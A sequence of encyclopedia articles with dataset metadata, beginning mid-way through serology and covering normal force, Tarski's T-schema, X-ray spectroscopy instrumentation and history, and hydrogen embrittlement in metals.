suggests that a person is currently or recently infected, while a positive result for IgG and negative result for IgM suggests that the person may have been infected or immunized in the past. Antibody testing for infectious diseases is often done in two phases: during the initial illness (acute phase) and after recovery (convalescent phase). The amount of antibody in each specimen (antibody titer) is compared, and a significantly higher amount of IgG in the convalescent specimen suggests infection as opposed to previous exposure. False negative results for antibody testing can occur in people who are immunosuppressed, as they produce lower amounts of antibodies, and in people who receive antimicrobial drugs early in the course of the infection. Transfusion medicine Blood typing is typically performed using serologic methods. The antigens on a person's red blood cells, which determine their blood type, are identified using reagents that contain antibodies, called antisera. When the antibodies bind to red blood cells that express the corresponding antigen, they cause red blood cells to clump together (agglutinate), which can be identified visually. The person's blood group antibodies can also be identified by adding plasma to cells that express the corresponding antigen and observing the agglutination reactions.
Other serologic methods used in transfusion medicine include crossmatching and the direct and indirect antiglobulin tests. Crossmatching is performed before a blood transfusion to ensure that the donor blood is compatible. It involves adding the recipient's plasma to the donor blood cells and observing for agglutination reactions. The direct antiglobulin test is performed to detect if antibodies are bound to red blood cells inside the person's body, which is abnormal and can occur in conditions like autoimmune hemolytic anemia, hemolytic disease of the newborn and transfusion reactions. The indirect antiglobulin test is used to screen for antibodies that could cause transfusion reactions and to identify certain blood group antigens. Immunology Serologic tests can help to diagnose autoimmune disorders by identifying abnormal antibodies directed against a person's own tissues (autoantibodies). Serological surveys A 2016 research paper by Metcalf et al., amongst whom were Neil Ferguson and Jeremy Farrar, stated that serological surveys are often used by epidemiologists to determine the prevalence of a disease in a population. Such surveys are sometimes performed by random, anonymous sampling from samples taken for other medical tests, or to assess the prevalence of antibodies of a specific organism or of a protective titre of antibodies in a population. Serological surveys are usually used to quantify the proportion of people or animals in a population positive for a specific antibody, or the titre or concentration of an antibody. These surveys are potentially the most direct and informative technique available to infer the dynamics of a population's susceptibility and level of immunity. The authors proposed a World Serology Bank (or serum bank) and foresaw "associated major methodological developments in serological testing, study design, and quantitative analysis, which could drive a step change in our understanding and optimum control of infectious diseases." In a reply entitled "Opportunities and challenges of a World Serum Bank", de Lusignan and Correa discussed the practical opportunities and challenges such a bank would face, and the Australian researcher Karen Coates offered a further reply on the proposal. In April 2020, Justin Trudeau formed the COVID-19 Immunity Task Force, whose mandate is to carry out a serological survey, a scheme launched in the midst of the COVID-19 pandemic. See also Forensic serology Medical laboratory Medical technologist Seroconversion Serovar Geoffrey Tovey, noted serologist References External links Serology (archived) – MedlinePlus Medical Encyclopedia Clinical pathology Blood tests Epidemiology Immunologic tests
Serology
[ "Chemistry", "Biology", "Environmental_science" ]
1,255
[ "Blood tests", "Immunologic tests", "Epidemiology", "Chemical pathology", "Environmental social science" ]
1,063,435
https://en.wikipedia.org/wiki/Normal%20force
In mechanics, the normal force is the component of a contact force that is perpendicular to the surface that an object contacts. In this instance normal is used in the geometric sense and means perpendicular, as opposed to the meaning "ordinary" or "expected". A person standing still on a platform is acted upon by gravity, which would pull them down towards the Earth's core unless there were a countervailing force from the resistance of the platform's molecules, a force which is named the "normal force". The normal force is one type of ground reaction force. If the person stands on a slope and does not sink into the ground or slide downhill, the total ground reaction force can be divided into two components: a normal force perpendicular to the ground and a frictional force parallel to the ground. In another common situation, if an object hits a surface with some speed, and the surface can withstand the impact, the normal force provides for a rapid deceleration, which will depend on the flexibility of the surface and the object. Equations In the case of an object resting upon a flat table (unlike on an incline as in Figures 1 and 2), the normal force on the object is equal but opposite in direction to the gravitational force applied on the object (that is, to its weight): $N = mg$, where m is mass and g is the gravitational field strength (about 9.81 m/s² on Earth). The normal force here represents the force applied by the table against the object that prevents it from sinking through the table, and requires that the table be sturdy enough to deliver this normal force without breaking. It is a common mistake to assume that the normal force and weight are an action-reaction force pair (they are not). In this case, the normal force and weight need to be equal in magnitude to explain why there is no upward acceleration of the object. For example, a ball that bounces upwards accelerates upwards because the normal force acting on the ball is larger in magnitude than the weight of the ball. Where an object rests on an incline as in Figures 1 and 2, the normal force is perpendicular to the plane the object rests on. Still, the normal force will be as large as necessary to prevent sinking through the surface, presuming the surface is sturdy enough. The strength of the force can be calculated as $N = mg\cos\theta$, where N is the normal force, m is the mass of the object, g is the gravitational field strength, and θ is the angle of the inclined surface measured from the horizontal. The normal force is one of the several forces which act on the object. In the simple situations so far considered, the most important other forces acting on it are friction and the force of gravity. Using vectors In general, the magnitude of the normal force, N, is the projection of the net surface interaction force, T, onto the normal direction, n, and so the normal force vector can be found by scaling the normal direction by the net surface interaction force. The surface interaction force, in turn, is equal to the dot product of the unit normal with the Cauchy stress tensor describing the stress state of the surface. That is, $N = \mathbf{n} \cdot \mathbf{T}$ with $\mathbf{T} = \boldsymbol{\sigma} \cdot \mathbf{n}$, or, in indicial notation, $N = n_i \sigma_{ik} n_k$. The parallel shear component of the contact force is known as the frictional force ($F_f$). The static coefficient of friction for an object on an inclined plane can be calculated as $\mu_s = \tan\theta$ for an object on the point of sliding, where θ is the angle between the slope and the horizontal.
Physical origin The normal force is directly a result of the Pauli exclusion principle and not a true force per se: it is a result of the interactions of the electrons at the surfaces of the objects. The atoms in the two surfaces cannot penetrate one another without a large investment of energy because there is no low-energy state for which the electron wavefunctions from the two surfaces overlap; thus no microscopic force is needed to prevent this penetration. However, these interactions are often modeled as a van der Waals force, a force that grows very large very quickly as distance becomes smaller. On the more macroscopic level, such surfaces can be treated as a single object, and two bodies do not penetrate each other due to the stability of matter, which is again a consequence of the Pauli exclusion principle, but also of the fundamental forces of nature: cracks in the bodies do not widen due to electromagnetic forces that create the chemical bonds between the atoms; the atoms themselves do not disintegrate because of the electromagnetic forces between the electrons and the nuclei; and the nuclei do not disintegrate due to the nuclear forces. Practical applications In an elevator either stationary or moving at constant velocity, the normal force on the person's feet balances the person's weight. In an elevator that is accelerating upward, the normal force is greater than the person's ground weight and so the person's perceived weight increases (making the person feel heavier). In an elevator that is accelerating downward, the normal force is less than the person's ground weight and so a passenger's perceived weight decreases. If a passenger were to stand on a weighing scale, such as a conventional bathroom scale, while riding the elevator, the scale will be reading the normal force it delivers to the passenger's feet, and will be different than the person's ground weight if the elevator cab is accelerating up or down. The weighing scale measures normal force (which varies as the elevator cab accelerates), not gravitational force (which does not vary as the cab accelerates). When we define upward to be the positive direction, constructing Newton's second law and solving for the normal force on a passenger yields $N = m(g + a)$, where a is the acceleration of the cab (positive upward, negative downward). In a gravitron amusement ride, the static friction caused by and perpendicular to the normal force acting on the passengers against the walls results in suspension of the passengers above the floor as the ride rotates. In such a scenario, the walls of the ride apply normal force to the passengers in the direction of the center, which is a result of the centripetal force applied to the passengers as the ride rotates. As a result of the normal force experienced by the passengers, the static friction between the passengers and the walls of the ride counteracts the pull of gravity on the passengers, resulting in suspension above ground of the passengers throughout the duration of the ride. When we define the center of the ride to be the positive direction, solving for the normal force on a passenger that is suspended above ground yields $N = \dfrac{m v^2}{r}$, where N is the normal force on the passenger, m is the mass of the passenger, v is the tangential velocity of the passenger and r is the distance of the passenger from the center of the ride. With the normal force known, we can solve for the static coefficient of friction needed to maintain a net force of zero in the vertical direction: $\mu_s = \dfrac{m g}{N} = \dfrac{g r}{v^2}$, where $\mu_s$ is the static coefficient of friction and g is the gravitational field strength.
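The incline and elevator formulas above lend themselves to a short numeric check. A minimal sketch, assuming g ≈ 9.81 m/s² and illustrative masses and angles:

```python
# Numeric check of N = m g cos(theta) and N = m (g + a) from the text above.
import math

G = 9.81  # gravitational field strength, m/s^2

def normal_force_incline(mass_kg: float, angle_deg: float) -> float:
    """N = m g cos(theta) for an object resting on an incline."""
    return mass_kg * G * math.cos(math.radians(angle_deg))

def scale_reading_in_elevator(mass_kg: float, accel_up: float) -> float:
    """N = m (g + a): what a bathroom scale reads in a cab accelerating upward at a."""
    return mass_kg * (G + accel_up)

print(normal_force_incline(10, 30))        # ≈ 84.96 N, versus 98.1 N on level ground
print(scale_reading_in_elevator(70, 1.5))  # ≈ 791.7 N, versus 686.7 N at rest
```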
See also Force Contact mechanics Normal stress References Force Statics
Normal force
[ "Physics", "Mathematics" ]
1,405
[ "Statics", "Force", "Physical quantities", "Quantity", "Mass", "Classical mechanics", "Wikipedia categories named after physical quantities", "Matter" ]
1,063,436
https://en.wikipedia.org/wiki/T-schema
The T-schema ("truth schema", not to be confused with "Convention T") is used to check if an inductive definition of truth is valid, which lies at the heart of any realisation of Alfred Tarski's semantic theory of truth. Some authors refer to it as the "Equivalence Schema", a synonym introduced by Michael Dummett. The T-schema is often expressed in natural language, but it can be formalized in many-sorted predicate logic or modal logic; such a formalisation is called a "T-theory." T-theories form the basis of much fundamental work in philosophical logic, where they are applied in several important controversies in analytic philosophy. As expressed in semi-natural language (where 'S' is the name of the sentence abbreviated to S): 'S' is true if and only if S. Example: 'snow is white' is true if and only if snow is white. The inductive definition By using the schema one can give an inductive definition for the truth of compound sentences. Atomic sentences are assigned truth values disquotationally. For example, the sentence "'Snow is white' is true" becomes materially equivalent with the sentence "snow is white", i.e. 'snow is white' is true if and only if snow is white. Said again, a sentence of the form "A" is true if and only if A is true. The truth of more complex sentences is defined in terms of the components of the sentence: A sentence of the form "A and B" is true if and only if A is true and B is true A sentence of the form "A or B" is true if and only if A is true or B is true A sentence of the form "if A then B" is true if and only if A is false or B is true; see material implication. A sentence of the form "not A" is true if and only if A is false A sentence of the form "for all x, A(x)" is true if and only if, for every possible value of x, A(x) is true. A sentence of the form "for some x, A(x)" is true if and only if, for some possible value of x, A(x) is true. Predicates for truth that meet all of these criteria are called "satisfaction classes", a notion often defined with respect to a fixed language (such as the language of Peano arithmetic); these classes are considered acceptable definitions for the notion of truth. Natural languages Joseph Heath points out that "the analysis of the truth predicate provided by Tarski's Schema T is not capable of handling all occurrences of the truth predicate in natural language. In particular, Schema T treats only "freestanding" uses of the predicate—cases when it is applied to complete sentences." He gives as an "obvious problem" the sentence: Everything that Bill believes is true. Heath argues that analyzing this sentence using T-schema generates the sentence fragment—"everything that Bill believes"—on the righthand side of the logical biconditional. See also Principle of bivalence Law of excluded middle References External links Mathematical logic Philosophical logic Truth Logical expressions
T-schema
[ "Mathematics" ]
681
[ "Mathematical logic", "Logical expressions" ]
1,063,456
https://en.wikipedia.org/wiki/X-ray%20spectroscopy
X-ray spectroscopy is a general term for several spectroscopic techniques for characterization of materials by using X-ray radiation. Characteristic X-ray spectroscopy When an electron from the inner shell of an atom is excited by the energy of a photon, it moves to a higher energy level. When it returns to the lower energy level, the energy it previously gained by excitation is emitted as a photon of one of the wavelengths uniquely characteristic of the element. Analysis of the X-ray emission spectrum produces qualitative results about the elemental composition of the specimen. Comparison of the specimen's spectrum with the spectra of samples of known composition produces quantitative results (after some mathematical corrections for absorption, fluorescence and atomic number). Atoms can be excited by a high-energy beam of charged particles such as electrons (in an electron microscope, for example), protons (see PIXE) or a beam of X-rays (see X-ray fluorescence, XRF, or, more recently, X-ray transmission, XRT). These methods enable elements from the entire periodic table to be analysed, with the exception of H, He and Li. In electron microscopy an electron beam excites X-rays; there are two main techniques for analysis of spectra of characteristic X-ray radiation: energy-dispersive X-ray spectroscopy (EDS) and wavelength-dispersive X-ray spectroscopy (WDS). In X-ray transmission (XRT), the equivalent atomic composition (Zeff) is captured based on photoelectric and Compton effects. Energy-dispersive X-ray spectroscopy In an energy-dispersive X-ray spectrometer, a semiconductor detector measures the energy of incoming photons. To maintain detector integrity and resolution, it should be cooled with liquid nitrogen or by Peltier cooling. EDS is widely employed in electron microscopes (where imaging rather than spectroscopy is the main task) and in cheaper and/or portable XRF units. Wavelength-dispersive X-ray spectroscopy In a wavelength-dispersive X-ray spectrometer, a single crystal diffracts the photons according to Bragg's law, and they are then collected by a detector. By moving the diffraction crystal and detector relative to each other, a wide region of the spectrum can be observed. To observe a large spectral range, three or four different single crystals may be needed. In contrast to EDS, WDS is a method of sequential spectrum acquisition. While WDS is slower than EDS and more sensitive to the positioning of the sample in the spectrometer, it has superior spectral resolution and sensitivity. WDS is widely used in microprobes (where X-ray microanalysis is the main task) and in XRF; it is also widely used in the field of X-ray diffraction to calculate various data, such as the interplanar spacing and the wavelength of the incident X-ray, using Bragg's law. X-ray emission spectroscopy The father-and-son scientific team of William Lawrence Bragg and William Henry Bragg, who were 1915 Nobel Prize winners, were the original pioneers in developing X-ray emission spectroscopy. An example of a spectrometer developed by William Henry Bragg, which was used by both father and son to investigate the structure of crystals, can be seen at the Science Museum, London. Jointly they measured the X-ray wavelengths of many elements to high precision, using high-energy electrons as the excitation source. A cathode-ray tube or an X-ray tube was used to direct electrons at crystals of numerous elements. They also painstakingly produced numerous diamond-ruled glass diffraction gratings for their spectrometers.
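As a numerical aside to the WDS paragraphs above, Bragg's law, n·λ = 2d·sin θ, is a one-line computation. A minimal sketch; the analyzing crystal, its commonly quoted spacing (2d ≈ 4.027 Å for LiF(200)), and the angle are illustrative assumptions:

```python
# Bragg's law as used in WDS: n * lambda = 2 * d * sin(theta).
import math

def bragg_wavelength(d_angstrom: float, theta_deg: float, order: int = 1) -> float:
    """Wavelength (angstroms) diffracted at angle theta by planes of spacing d."""
    return 2.0 * d_angstrom * math.sin(math.radians(theta_deg)) / order

# Example: LiF(200) analyzing crystal (2d ≈ 4.027 Å), first order, theta = 22.5°
print(bragg_wavelength(d_angstrom=2.0135, theta_deg=22.5))  # ≈ 1.54 Å (Cu Kα region)
```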
The law of diffraction of a crystal is called Bragg's law in their honor. Intense and wavelength-tunable X-rays are now typically generated with synchrotrons. In a material, the X-rays may suffer an energy loss compared to the incoming beam. This energy loss of the re-emerging beam reflects an internal excitation of the atomic system, an X-ray analogue to the well-known Raman spectroscopy that is widely used in the optical region. In the X-ray region there is sufficient energy to probe changes in the electronic state (transitions between orbitals; this is in contrast with the optical region, where the energy emitted or absorbed is often due to changes in the state of the rotational or vibrational degrees of freedom of the system's atoms and groups of atoms). For instance, in the ultra soft X-ray region (below about 1 keV), crystal field excitations give rise to the energy loss. The photon-in-photon-out process may be thought of as a scattering event. When the X-ray energy corresponds to the binding energy of a core-level electron, this scattering process is resonantly enhanced by many orders of magnitude. This type of X-ray emission spectroscopy is often referred to as resonant inelastic X-ray scattering (RIXS). Due to the wide separation of orbital energies of the core levels, it is possible to select a certain atom of interest. The small spatial extent of core-level orbitals forces the RIXS process to reflect the electronic structure in close vicinity of the chosen atom. Thus, RIXS experiments give valuable information about the local electronic structure of complex systems, and theoretical calculations are relatively simple to perform. Instrumentation There exist several efficient designs for analyzing an X-ray emission spectrum in the ultra soft X-ray region. The figure of merit for such instruments is the spectral throughput, i.e. the product of detected intensity and spectral resolving power. Usually, it is possible to change these parameters within a certain range while keeping their product constant. Grating spectrometers Usually X-ray diffraction in spectrometers is achieved on crystals, but in grating spectrometers the X-rays emerging from a sample must pass a source-defining slit; optical elements (mirrors and/or gratings) then disperse them by diffraction according to their wavelength and, finally, a detector is placed at their focal points. Spherical grating mounts Henry Augustus Rowland (1848–1901) devised an instrument that allowed the use of a single optical element that combines diffraction and focusing: a spherical grating. The reflectivity of X-rays is low, regardless of the material used, and therefore grazing incidence upon the grating is necessary. X-ray beams impinging on a smooth surface at a few degrees glancing angle of incidence undergo external total reflection, which is exploited to enhance the instrumental efficiency substantially. Denote by R the radius of a spherical grating, and imagine a circle with half the radius R, tangent to the center of the grating surface. This small circle is called the Rowland circle. If the entrance slit is anywhere on this circle, then a beam passing the slit and striking the grating will be split into a specularly reflected beam and beams of all diffraction orders that come into focus at certain points on the same circle. Plane grating mounts Similar to optical spectrometers, a plane grating spectrometer first needs optics that turn the divergent rays emitted by the X-ray source into a parallel beam.
This may be achieved by using a parabolic mirror. The parallel rays emerging from this mirror strike a plane grating (with constant groove distance) at the same angle and are diffracted according to their wavelength. A second parabolic mirror then collects the diffracted rays at a certain angle and creates an image on a detector. A spectrum within a certain wavelength range can be recorded simultaneously by using a two-dimensional position-sensitive detector such as a microchannel photomultiplier plate or an X-ray sensitive CCD chip (photographic film plates can also be used). Interferometers Instead of using the multiple-beam interference produced by gratings, one may simply let two rays interfere. By recording the intensity of two such rays combined co-linearly at some fixed point and changing their relative phase, one obtains an intensity spectrum as a function of path length difference. One can show that this is equivalent to the Fourier transform of the spectrum as a function of frequency. The highest recordable frequency of such a spectrum is dependent on the minimum step size chosen in the scan, and the frequency resolution (i.e. how well a certain wave can be defined in terms of its frequency) depends on the maximum path length difference achieved. The latter feature allows a much more compact design for achieving high resolution than for a grating spectrometer, because X-ray wavelengths are small compared to attainable path length differences. Early history of X-ray spectroscopy in the U.S. Philips Gloeilampen Fabrieken, headquartered in Eindhoven in the Netherlands, got its start as a manufacturer of light bulbs, but quickly evolved into one of the leading manufacturers of electrical apparatus, electronics, and related products, including X-ray equipment. It has also had one of the world's largest R&D labs. In 1940, the Netherlands was overrun by Hitler’s Germany. The company was able to transfer a substantial sum of money to a company that it set up as an R&D laboratory in an estate in Irvington-on-Hudson, NY. As an extension of their work on light bulbs, the Dutch company had developed a line of X-ray tubes for medical applications that were powered by transformers. These X-ray tubes could also be used in scientific X-ray instrumentation, but there was very little commercial demand for the latter. As a result, management decided to try to develop this market and set up development groups in their research labs in both Holland and the United States. They hired Dr. Ira Duffendack, a professor at the University of Michigan and a world expert on infrared research, to head the lab and to hire a staff. In 1951 he hired Dr. David Miller as Assistant Director of Research. Dr. Miller had done research on X-ray instrumentation at Washington University in St. Louis. Dr. Duffendack also hired Dr. Bill Parrish, a well-known researcher in X-ray diffraction, to head up the section of the lab on X-ray instrumental development. X-ray diffraction units were widely used in academic research departments to do crystal analysis. An essential component of a diffraction unit was a very accurate angle-measuring device known as a goniometer. Such units were not commercially available, so each investigator had to try to make their own. Dr. Parrish decided this would be a good device to use to generate an instrumental market, so his group designed and learned how to manufacture a goniometer.
This market developed quickly and, with the readily available tubes and power supplies, a complete diffraction unit was made available and was successfully marketed. The U.S. management did not want the laboratory to be converted to a manufacturing unit, so it decided to set up a commercial unit to further develop the X-ray instrumentation market. In 1953 Norelco Electronics was established in Mount Vernon, NY, dedicated to the sale and support of X-ray instrumentation. It included a sales staff, a manufacturing group, an engineering department and an applications lab. Dr. Miller was transferred from the lab to head up the engineering department. The sales staff sponsored three schools a year, one in Mount Vernon, one in Denver, and one in San Francisco. The week-long school curricula reviewed the basics of X-ray instrumentation and the specific application of Norelco products. The faculty were members of the engineering department and academic consultants. The schools were well attended by academic and industrial R&D scientists. The engineering department was also a new product development group. It added an X-ray spectrograph to the product line very quickly and contributed other related products for the next 8 years. The applications lab was an essential sales tool. When the spectrograph was introduced as a quick and accurate analytical chemistry device, it was met with widespread skepticism. All research facilities had a chemistry department, and analysis was done by “wet chemistry” methods. The idea of doing this analysis by physics instrumentation was considered suspect. To overcome this bias, the salesman would ask a prospective customer for a task the customer was doing by “wet methods”. The task would be given to the applications lab, which would demonstrate how accurately and quickly it could be done using the X-ray units. This proved to be a very strong sales tool, particularly when the results were published in the Norelco Reporter, a technical journal issued monthly by the company with wide distribution to commercial and academic institutions. An X-ray spectrograph consists of a high-voltage power supply (50 kV or 100 kV), a broadband X-ray tube, usually with a tungsten anode and a beryllium window, a specimen holder, an analyzing crystal, a goniometer, and an X-ray detector device. These are arranged as shown in Fig. 1. The continuous X-ray spectrum emitted from the tube irradiates the specimen and excites the characteristic spectral X-ray lines in the specimen. Each of the 92 elements emits a characteristic spectrum. Unlike the optical spectrum, the X-ray spectrum is quite simple. The strongest line, usually the Kα line but sometimes the Lα line, suffices to identify the element. The existence of a particular line betrays the presence of an element, and the intensity is proportional to the amount of the particular element in the specimen. The characteristic lines are reflected from a crystal, the analyzer, under an angle that is given by the Bragg condition. The crystal samples all the diffraction angles θ by rotation, while the detector rotates over the corresponding angle 2θ. With a sensitive detector, the X-ray photons are counted individually. By stepping the detector along the angle and leaving it in position for a known time, the number of counts at each angular position gives the line intensity. These counts may be plotted on a curve by an appropriate display unit.
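In the spirit of the scan just described, the following is a small sketch of how measured 2θ peaks can be converted back to wavelengths and matched to elements; the analyzer d-spacing and the three-line reference table are assumptions chosen for illustration, not data from any particular instrument:

```python
import math

# Hypothetical K-alpha reference wavelengths (angstroms); a real instrument
# would use tabulated values covering all detectable elements.
K_ALPHA_LINES = {"Mo": 0.7107, "Cu": 1.5406, "Fe": 1.9373}

def wavelength_from_scan(two_theta_deg, d_spacing_angstrom, order=1):
    """Invert Bragg's law: lambda = 2*d*sin(theta)/n."""
    theta = math.radians(two_theta_deg / 2.0)
    return 2.0 * d_spacing_angstrom * math.sin(theta) / order

def identify(two_theta_deg, d_spacing_angstrom, tol=0.01):
    """Match a measured peak to the nearest reference line, if any."""
    lam = wavelength_from_scan(two_theta_deg, d_spacing_angstrom)
    for element, ref in K_ALPHA_LINES.items():
        if abs(lam - ref) < tol:
            return element, lam
    return None, lam

# A peak observed at 2-theta = 20.3 deg with an assumed LiF(200) crystal
# (d = 2.014 angstroms) maps back to roughly 0.71 angstroms, i.e. Mo K-alpha.
print(identify(20.3, 2.014))
```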
The characteristic X-rays come out at specific angles, and since the angular position for every X-ray spectral line is known and recorded, it is easy to find the sample's composition. A chart for a scan of a molybdenum specimen is shown in Fig. 2. The tall peak on the left side is the characteristic alpha line at a 2θ of 12 degrees. Second- and third-order lines also appear. Since the alpha line is often the only line of interest in many industrial applications, the final device in the Norelco X-ray spectrographic instrument line was the Autrometer. This device could be programmed to automatically read at any desired 2θ angle for any desired time interval. Soon after the Autrometer was introduced, Philips decided to stop marketing X-ray instruments developed in both the U.S. and Europe and settled on offering only the Eindhoven line of instruments. In 1961, during the development of the Autrometer, Norelco was given a sub-contract by the Jet Propulsion Lab. The Lab was working on the instrument package for the Surveyor spacecraft. The composition of the Moon’s surface was of major interest, and the use of an X-ray detection instrument was viewed as a possible solution. Working with a power limit of 30 watts was very challenging, and a device was delivered but it wasn’t used. Later NASA developments did lead to an X-ray spectrographic unit that did make the desired Moon soil analysis. The Norelco efforts faded, but the use of X-ray spectroscopy in units known as XRF instruments continued to grow. With a boost from NASA, units were finally reduced to handheld size and are seeing widespread use. Units are available from Bruker, Thermo Scientific, Elvatech Ltd. and SPECTRA. Other types of X-ray spectroscopy X-ray absorption spectroscopy X-ray magnetic circular dichroism See also Auger electron spectroscopy X-Ray Spectrometry (journal) New perspectives of explosive detection based on CdTe/CdZnTe spectrometric detectors References
X-ray spectroscopy
[ "Physics", "Chemistry" ]
3,310
[ "X-ray spectroscopy", "Spectroscopy", "Spectrum (physical sciences)" ]
1,063,470
https://en.wikipedia.org/wiki/Hydrogen%20embrittlement
Hydrogen embrittlement (HE), also known as hydrogen-assisted cracking or hydrogen-induced cracking (HIC), is a reduction in the ductility of a metal due to absorbed hydrogen. Hydrogen atoms are small and can permeate solid metals. Once absorbed, hydrogen lowers the stress required for cracks in the metal to initiate and propagate, resulting in embrittlement. Hydrogen embrittlement occurs in steels, as well as in iron, nickel, titanium, cobalt, and their alloys. Copper, aluminium, and stainless steels are less susceptible to hydrogen embrittlement. The essential facts about the nature of hydrogen embrittlement have been known since the 19th century. Hydrogen embrittlement is maximised at around room temperature in steels, and most metals are relatively immune to hydrogen embrittlement at temperatures above 150 °C. Hydrogen embrittlement requires the presence of both atomic ("diffusible") hydrogen and a mechanical stress to induce crack growth, although that stress may be applied or residual. Hydrogen embrittlement increases at lower strain rates. In general, higher-strength steels are more susceptible to hydrogen embrittlement than mid-strength steels. Metals can be exposed to hydrogen from two types of sources: gaseous hydrogen and hydrogen chemically generated at the metal surface. Gaseous hydrogen is molecular hydrogen and does not cause embrittlement, though it can cause a hot hydrogen attack (see below). It is the atomic hydrogen from a chemical attack which causes embrittlement because the atomic hydrogen dissolves quickly into the metal at room temperature. Gaseous hydrogen is found in pressure vessels and pipelines. Electrochemical sources of hydrogen include acids (as may be encountered during pickling, etching, or cleaning), corrosion (typically due to aqueous corrosion or cathodic protection), and electroplating. Hydrogen can be introduced into the metal during manufacturing by the presence of moisture during welding or while the metal is molten. The most common causes of failure in practice are poorly controlled electroplating or damp welding rods. Hydrogen embrittlement as a term can be used to refer specifically to the embrittlement that occurs in steels and similar metals at relatively low hydrogen concentrations, or it can be used to encompass all embrittling effects that hydrogen has on metals. These broader embrittling effects include hydride formation, which occurs in titanium and vanadium but not in steels, and hydrogen-induced blistering, which only occurs at high hydrogen concentrations and does not require the presence of stress. However, hydrogen embrittlement is almost always distinguished from high temperature hydrogen attack (HTHA), which occurs in steels at temperatures above 204 °C and involves the formation of methane pockets. The mechanisms (there are many) by which hydrogen causes embrittlement in steels are not comprehensively understood and continue to be explored and studied. Mechanisms Hydrogen embrittlement is a complex process involving a number of distinct contributing micro-mechanisms, not all of which need to be present. The mechanisms include the formation of brittle hydrides, the creation of voids that can lead to high-pressure bubbles, enhanced decohesion at internal surfaces and localised plasticity at crack tips that assist in the propagation of cracks. There is a great variety of mechanisms that have been proposed and investigated as to the cause of brittleness once diffusible hydrogen has been dissolved into the metal. 
In recent years, it has become widely accepted that HE is a complex process dependent on material and environment, so that no single mechanism applies exclusively. Internal pressure: At high hydrogen concentrations, absorbed hydrogen species recombine in voids to form hydrogen molecules (H2), creating pressure from within the metal. This pressure can increase to levels where cracks form, commonly designated hydrogen-induced cracking (HIC), as well as blisters forming on the specimen surface, designated hydrogen-induced blistering. These effects can reduce ductility and tensile strength. Hydrogen enhanced localised plasticity (HELP): Hydrogen increases the nucleation and movement of dislocations at a crack tip. HELP results in crack propagation by localised ductile failure at the crack tip with less deformation occurring in the surrounding material, which gives a brittle appearance to the fracture. Hydrogen decreased dislocation emission: Molecular dynamics simulations reveal a ductile-to-brittle transition caused by the suppression of dislocation emission at the crack tip by dissolved hydrogen. This prevents the crack tip from rounding off, so the sharp crack then leads to brittle-cleavage failure. Hydrogen enhanced decohesion (HEDE): Interstitial hydrogen lowers the stress required for metal atoms to fracture apart. HEDE can only occur when the local concentration of hydrogen is high, such as due to the increased hydrogen solubility in the tensile stress field at a crack tip, at stress concentrators, or in the tension field of edge dislocations. Metal hydride formation: The formation of brittle hydrides with the parent material allows cracks to propagate in a brittle fashion. This is particularly a problem with vanadium alloys, while most other structural alloys do not easily form hydrides. Phase transformations: Hydrogen can induce phase transformations in some materials, and the new phase may be less ductile. Material susceptibility Hydrogen embrittles a variety of metals including steel, aluminium (at high temperatures only), and titanium. Austempered iron is also susceptible, though austempered steel (and possibly other austempered metals) displays increased resistance to hydrogen embrittlement. NASA has reviewed which metals are susceptible to embrittlement and which are only prone to hot hydrogen attack, the latter group including nickel alloys, austenitic stainless steels, aluminium and its alloys, and copper (including its alloys, e.g. beryllium copper). Sandia has also produced a comprehensive guide. Steels Steel with an ultimate tensile strength of less than 1000 MPa (~145,000 psi) or a hardness of less than HRC 32 on the Rockwell hardness scale is not generally considered susceptible to hydrogen embrittlement. As an example of severe hydrogen embrittlement, the elongation at failure of 17-4PH precipitation-hardened stainless steel was measured to drop from 17% to only 1.7% when smooth specimens were exposed to high-pressure hydrogen. As the strength of steels increases, the fracture toughness decreases, so the likelihood that hydrogen embrittlement will lead to fracture increases. In high-strength steels, anything above a hardness of HRC 32 may be susceptible to early hydrogen cracking after plating processes that introduce hydrogen. They may also experience long-term failures any time from weeks to decades after being placed in service due to accumulation of hydrogen over time from cathodic protection and other sources.
Numerous failures have been reported in the hardness range HRC 32–36 and above; therefore, parts in this range should be checked during quality control to ensure they are not susceptible. Testing the fracture toughness of hydrogen-charged, embrittled specimens is complicated by the need to keep charged specimens very cold, in liquid nitrogen, to prevent the hydrogen from diffusing away. Copper Copper alloys which contain oxygen can be embrittled if exposed to hot hydrogen. The hydrogen diffuses through the copper and reacts with inclusions of Cu2O, forming two metallic Cu atoms and H2O (water), which then forms pressurized bubbles at the grain boundaries. This process can cause the grains to be forced away from each other, and is known as steam embrittlement (because steam is directly produced inside the copper crystal lattice, not because exposure of copper to external steam causes the problem). Vanadium, nickel, and titanium Alloys of vanadium, nickel, and titanium have a high hydrogen solubility, and can therefore absorb significant amounts of hydrogen. This can lead to hydride formation, resulting in irregular volume expansion and reduced ductility (because metallic hydrides are brittle ceramic materials). This is a particular issue when looking for non-palladium-based alloys for use in hydrogen separation membranes. Fatigue While most failures in practice have been through fast fracture, there is experimental evidence that hydrogen also affects the fatigue properties of steels. This is entirely expected given the nature of the embrittlement mechanisms proposed for fast fracture. In general, hydrogen embrittlement has a strong effect on high-stress, low-cycle fatigue and very little effect on high-cycle fatigue. Environmental embrittlement Hydrogen embrittlement is a volume effect: it acts throughout the bulk of the material. Environmental embrittlement is a surface effect, where molecules from the atmosphere surrounding the material under test are adsorbed onto the fresh crack surface. This is most clearly seen from fatigue measurements, where the measured crack growth rates can be an order of magnitude higher in hydrogen than in air. That this effect is due to adsorption, which saturates when the crack surface is completely covered, is understood from the weak dependence of the effect on the pressure of hydrogen. Environmental embrittlement is also observed to reduce fracture toughness in fast fracture tests, but the severity is much reduced compared with the same effect in fatigue. Hydrogen embrittlement occurs when a previously embrittled material has low fracture toughness regardless of the atmosphere in which it is tested. Environmental embrittlement occurs when the low fracture toughness is only observed in that atmosphere. Sources of hydrogen During manufacture, hydrogen can be dissolved into the component by processes such as phosphating, pickling, electroplating, casting, carbonizing, surface cleaning, electrochemical machining, welding, hot roll forming, and heat treatments. During service use, hydrogen can be dissolved into the metal from wet corrosion or through misapplication of protection measures such as cathodic protection. In one case of failure during construction of the San Francisco–Oakland Bay Bridge, galvanized (i.e. zinc-plated) rods were left wet for five years before being tensioned. The reaction of the zinc with water introduced hydrogen into the steel.
